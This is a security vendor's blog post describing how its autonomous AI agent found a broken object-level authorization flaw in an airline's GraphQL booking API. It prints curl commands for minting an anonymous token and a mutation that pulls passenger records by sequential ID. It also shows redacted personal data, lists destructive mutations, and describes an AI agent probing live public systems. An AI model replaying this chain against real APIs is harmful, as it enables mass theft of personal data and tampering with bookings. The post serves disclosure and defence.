This Red Agent POV focuses on Broken Object-Level Authorization (BOLA), and deep dives into a critical authorization bypass vulnerability discovered in an airline’s GraphQL booking API. As part of its ongoing mission, the Red Agent continuously scans the public internet and our customers, helping uncover exploitable risks in the wild. Operating fully autonomously, the Red Agent mapped the backend architecture, established an anonymous session, and verified mass data extraction within 15 minutes. This exploit exposed high-profile passenger data, yielding complete read, and write capabilities over active travel itineraries.
What is Broken Object-Level Authorization (BOLA)?
Broken Object-Level Authorization occurs when an application fails to validate whether a user has the required permissions to access a specific object or record. It currently occupies the top spot on the OWASP API Security Top 10 list.
In modern cloud architectures, APIs act as direct programmatic gateways to microservices, orchestration layers, and sensitive data lakes. When developers rely on predictable identifiers without enforcing strict, user-specific authorization checks at the backend resolver layer, the entire system becomes exposed. Attackers can manipulate identifiers in API requests to bypass frontend validation controls entirely, allowing them to reach core databases and regulated user records directly.
What did the Red Agent discover?
Red Agent discovered that the airline’s GraphQL booking API utilized sequential integer identifiers without implementing backend authorization checks. While the application enforced front-end authentication by generating distinct session tokens for different user roles (such as anonymous, registered, and corporate users), downstream API resolvers failed to validate these roles when processing data requests.
By submitting sequential booking numbers to these unprotected resolvers, the Red Agent gained unauthenticated access to the passenger database. This permitted the extraction of travel records spanning two years, including names, dates of birth, billing addresses, masked credit cards, and live flight itineraries. Beyond data exfiltration, the anonymous session also possessed the permissions required to modify or delete active bookings.
| Mutation | Operational Impact |
|---|---|
| contactsChange +bookingSet | Alter contact emails to completely hijack customer accounts |
| flightDelete | Quietly delete flight segments and cancel active trips |
| groupDivide | Arbitrarily separate passengers away from their travel groups |
| priceOverride | Manually override flight pricing structures to zero out costs |
| refundIssue /voidRefund | Issue unauthorized financial refunds back to arbitrary accounts |
How did it find the exploit?
The Red Agent approached the target with zero prior knowledge, only relying on reasoning-driven testing to build a dynamic mental model of the system and iterate scanning accordingly.
The target
The target was the primary public web infrastructure of the airline. The Red Agent initiated its assessment with a single root URL and no additional context, seeds, or credentials. Its early hypotheses focused on mapping public-facing entry points, discovering backend API endpoints, identifying session management mechanisms, and probing for parameter handling inconsistencies within the booking workflows.
Phase 1: Client-Side Mapping and Session Minting
The Red Agent began by systematically analyzing the client-side JavaScript bundles downloaded by a standard visitor to the homepage. From this analysis, it successfully extracted the structural footprint of the backend architecture which allowed it to discover the core API gateway at a dedicated subdomain and identify a multi-step token acquisition flow.
The agent hypothesized that it could replay this sequence to obtain a valid session. It executed the token flow using empty credentials, adapting based on observed responses to successfully mint an anonymous web session token.
# Step 1: Request initial token with zero credentials
curl -s -X POST 'https://api.[redacted]/api/kdf/v2/token' \
-H 'Content-Type: application/json' \
-d '{"credentials":{"channelType":"DigitalWeb"}}'
# Step 2: Exchange initial token for an anonymous session token
curl -s 'https://api.[redacted]/api/kdf/v1/token' \
-H 'Authorization: Bearer <initial_token>'The server issued a session token with an anonymous web role code, structurally intended only for unauthenticated browsing of public flight schedules.
Phase 2: GraphQL Schema Introspection
Armed with a valid anonymous session token, the Red Agent issued a comprehensive GraphQL introspection query to dynamically map the backend schema. The response revealed a massive footprint: 514 queries and 428 mutations - all available to the anonymous session.
The agent analyzed these mutations and flagged several highly sensitive operations that accepted simple integer parameters, such as bookingRetrieveByBookingId. It developed a hypothesis that these endpoints might lack proper backend validation and focused its investigation there.
The Breakthrough
The breakthrough occurred when the Red Agent formulated a targeted mutation payload designed to query a specific, predicted integer booking ID:
curl -s -X POST 'https://api.[redacted]/api/v1/graph' \
-H 'Authorization: Bearer <anonymous_session_token>' \
-H 'Content-Type: application/json' \
-d '{"query":"mutation { bookingRetrieveByBookingId(bookingId: 144 (redacted)) { recordLocator passengers { key value { name { first last } } } contacts { key value { emailAddress phoneNumbers { number } } } journeys { designator { origin destination departure } } } }"}'
The backend processed the request and returned the complete, unredacted booking record of an active customer. To confirm this was systemic, the Red Agent tested twenty sequential IDs. Every single request returned a distinct customer profile including names, contact details, billing addresses, and flight itineraries.
Data Exposure Validation
The agent cross-referenced these findings with supplementary REST endpoints to validate the full extent of data exposure:
GET /api/kdf/v1/booking/passengers- full names, dates of birth, gender profilesGET /api/kdf/v1/booking/contacts- personal email addresses, direct phone numbersGET /api/kdf/v1/booking/payments- masked credit cards, verified billing addresses
{
"recordLocator": "REDACTED",
"passengers": [{"name": {"first": "████", "last": "████"}, "dateOfBirth":
"1995-██-██"}],
"contacts": [{"emailAddress": "████@gmail.com", "phoneNumbers": [{"number": "+1-███-███-████"}]}],
"payments": [{"cardNumber": "████████████5781", "expiration": "2028-09",
"avs": {"streetAddress": "████ ██████ Blvd", "city": "████████", "state": "██"}}],
"journeys": [{"designator": {"origin": "███", "destination": "███", "departure": "███"}}]
}It validated the exposure of this data per booking: full name, date of birth, email, phone, billing address, masked credit card with expiration, loyalty number, and complete itinerary.
Why this matters
Traditional DAST scanners and signature-based tools cannot detect this class of logic flaws. Because the request uses entirely valid GraphQL syntax and legitimate endpoints, it does not seem unusual to a standard security tool. The winning payload did not have a static signature, and uncovering it requires a dynamic mental model capable of connecting multiple sequential observations.
The Red Agent had to read client-side code, dynamically extract authentication flows, map an entire GraphQL schema, and recognize the architectural relationship between anonymous tokens and unprotected data resolvers. This application-layer vulnerability drastically expands the blast radius within the cloud environment. By exposing core database resolvers to unauthenticated internet traffic, a simple logic flaw effectively nullifies all network perimeter security. In modern cloud architectures, ensuring robust, context-aware authorization at the object level is the only way to prevent automated agents from compromising entire data layers in a matter of minutes.
Key Takeaways
AI attackers are already here: An AI agent autonomously read JavaScript, minted a session, discovered the API schema, identified an authorization gap, and confirmed mass data access to a major airline’s booking database, all within 15 minutes, with zero human guidance. Any attacker with access to a frontier model can replicate this chain today. The barrier to breaching production systems has fundamentally shifted.
The basics are the breach: This wasn’t a complex bug. It was a missing authorization check on a sequential integer ID, an OWASP API #1 most common risk since 2019. Object-level access checks on every resolver, non-guessable identifiers, restricted GraphQL introspection in production. These are known mitigations that most organizations don’t deploy, and coding agents don’t take for granted when vibe coding applications.
Conventional scanners are blind to this class of vulnerability: The Red Agent hypothesizes on every endpoint it touches, which enables it to discover multi-step risks that remain blind spots to traditional signature-based scanners.
Want to see more from the Red Agent?
We will be sharing more examples of the risks Red Agent uncovers. If you would like to see what types of risks it can find in your environment, learn more about the Red Agent (login required) or schedule a live demo with our team.
